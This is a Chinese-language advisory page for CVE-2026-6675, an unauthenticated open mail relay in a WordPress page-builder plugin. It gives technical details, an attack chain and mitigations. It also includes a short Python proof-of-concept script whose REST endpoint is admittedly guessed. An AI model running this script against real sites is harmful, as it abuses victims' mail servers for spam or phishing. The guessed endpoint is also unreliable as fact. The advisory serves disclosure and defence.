CVE-2026-6675 CVSS 5.3 中危

CVE-2026-6675 WordPress插件开放邮件中继漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6675

漏洞类型

开放邮件中继

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Responsive Blocks – Page Builder for Blocks & Patterns

漏洞概述

WordPress插件“Responsive Blocks – Page Builder for Blocks & Patterns”在所有版本（包括2.2.0及以下）中存在未经身份验证的开放邮件中继漏洞。该漏洞源于插件对公共REST API路由中提供的收件人邮箱地址缺乏足够的授权检查及服务器端验证。未经身份验证的攻击者可利用此漏洞，通过受影响WordPress站点的邮件服务器向任意收件人发送电子邮件，从而将站点转变为开放邮件中继，造成严重的安全风险。

技术细节

该漏洞的根本原因是插件在处理邮件发送功能时，未对公共REST API端点实施严格的访问控制策略。攻击者无需登录WordPress后台（PR:N），即可直接触发邮件发送逻辑。具体而言，插件在接收包含收件人地址的HTTP请求时，直接将用户输入的数据传递给wp_mail()函数或类似的邮件处理机制，而未验证请求来源的合法性或收件人是否在允许列表内。这使得攻击者可以通过构造特制的POST请求，利用受害者的服务器资源向外发送垃圾邮件或钓鱼邮件，导致服务器IP信誉受损。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描互联网或特定目标，识别出使用WordPress且安装了“Responsive Blocks – Page Builder for Blocks & Patterns”插件（版本<=2.2.0）的网站。

STEP 2

2. 构造攻击请求

攻击者确定插件暴露的公共REST API路由，并构造包含恶意收件人地址的HTTP POST请求包。

STEP 3

3. 发送邮件

攻击者向目标服务器发送请求，由于缺乏身份验证，服务器接收请求并调用内部邮件服务向攻击者指定的任意邮箱发送邮件。

STEP 4

4. 完成利用

攻击者成功利用受害者的服务器作为中继发送垃圾邮件，隐藏自身身份并消耗受害者资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests def exploit_open_relay(target_url, victim_email): # Vulnerable endpoint might be similar to /wp-json/rba/v1/send-email # Actual endpoint needs confirmation from source code analysis api_endpoint = f"{target_url}/wp-json/rba/v1/send-email" headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-6675-Scanner" } # Payload construction based on typical REST API structure payload = { "to": victim_email, "subject": "Security Alert: Open Relay Test", "body": "This email was sent via an unauthenticated open relay vulnerability." } try: response = requests.post(api_endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Success: Email likely sent to {victim_email}") print(f"[+] Server Response: {response.text}") else: print(f"[-] Failed: HTTP {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target target_email = "[email protected]" exploit_open_relay(target, target_email)

影响范围

Responsive Blocks – Page Builder for Blocks & Patterns <= 2.2.0

防御指南

临时缓解措施

由于该漏洞无需认证即可利用，风险较高。管理员应尽快检查插件版本并进行升级。如果暂时无法升级，可以通过服务器配置（如Apache的.htaccess或Nginx规则）阻止对`/wp-json/`路径下特定接口的外部访问，或者仅允许特定IP访问管理功能，以此作为临时缓解手段。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表